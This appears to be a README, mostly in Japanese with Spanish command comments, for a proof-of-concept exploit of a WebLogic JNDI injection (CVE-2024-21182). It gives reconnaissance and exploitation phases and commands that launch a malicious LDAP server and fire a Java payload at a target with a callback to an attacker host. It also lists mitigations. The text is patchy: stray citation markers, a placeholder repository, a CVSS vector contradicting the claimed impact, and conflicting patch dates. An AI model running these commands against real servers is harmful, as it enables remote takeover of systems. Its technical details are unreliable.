
CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
CVE-2024-21182 は、Oracle WebLogic Server の Core コンポーネントに影響を与える、認証を必要としない JNDI インジェクション脆弱性です。T3 または IIOP プロトコルを介したリモートの攻撃者が、サーバー上で任意のコードを実行 (RCE) し、サーバー上のすべてのデータへの完全なアクセスを取得できる可能性があります[citation:5][citation:8][citation:9]。
このリポジトリには、AggregatableOpaqueReference + MessageDestinationReference ガジェットチェーンを使用して CVE-2023-21839 のパッチを突破する、動作する Proof of Concept (PoC) が含まれています[citation:2][citation:4]。
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
フェーズ 1: 偵察: T3/IIOP ポート (7001) が公開されている WebLogic サーバーを特定する。
フェーズ 2: 分析: サーバーが脆弱なバージョン (12.2.1.4.0 または 14.1.1.0.0) を実行しているか、2024年10月のパッチが適用されていないかを判断する。
フェーズ 3: 悪用 (技術的な流れ):
AggregatableOpaqueReference オブジェクトを作成する[citation:2]。referent を、悪意のある MessageDestinationReference を指すように変更する[citation:4]。wlthint3client.jar (WebLogic のインストールから抽出可能)。# 1. Clonar el repositorio
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182
# 2. Iniciar el laboratorio (víctima + atacante)
docker-compose up -d
# 3. Ejecutar la explotación automática
./validate.sh
Explotación contra un objetivo real (autorizado)
bash
# 1. Iniciar el servidor LDAP/HTTP malicioso
python3 exploit/ldap_server.py
# 2. En otra terminal, ejecutar el payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
## 📊 実証された影響
サーバー上でのリモートコード実行 (RCE)
アプリケーションの重要データへの不正アクセス
アプリケーションサーバーの完全な侵害
企業ネットワーク内での横展開 (ラテラルムーブメント) の潜在的な入り口
ランサムウェアやその他の悪意のあるペイロード展開の基盤
CISA による現在のステータス: "Known To Be Used in Ransomware Campaigns? Unknown" (ただし、通常は該当し、ミドルウェアの RCE はランサムウェア侵入の初期ベクトルとなる)。
## 🛡️ 緩和策
直ちにパッチを適用する: Oracle Critical Patch Update (2024年10月またはそれ以降) を適用する。
ネットワークの制限: T3/IIOP ポート (例: 7001) へのアクセスを信頼できる送信元のみにブロック/制限する。
監視: JNDI ツリー内の異常なバインド/ルックアップの試みを検出する。
## ⚠️ 法的免責事項
このコードは教育および研究目的に限られます。明示的な許可なくシステムに対してこの PoC を不正に使用することは違法です。作者はこの情報の悪用について一切の責任を負いません。
## 📚 参考情報
NVD - CVE-2024-21182
CISA KEV Catalog
Oracle Security Advisory
元の技術分析
## 🤝 クレジット
ガジェットチェーンを発見した最初の研究者
再現可能な Docker ラボを提供した dinosn
| 属性 | 値 |
|---|
| CVE | CVE-2024-21182 |
| 製品 | Oracle WebLogic Server (Core) |
| 影響を受けるバージョン | 12.2.1.4.0 および 14.1.1.0.0[citation:7] |
| 利用可能なパッチ | Oracle Critical Patch Update (2024年7月および2024年10月)[citation:6] |
| CISA KEV ステータス | アクティブな悪用が確認済み (2026年6月1日追加)[citation:3][citation:8] |
| CISA の緩和期限 | 2026年6月4日[citation:8] |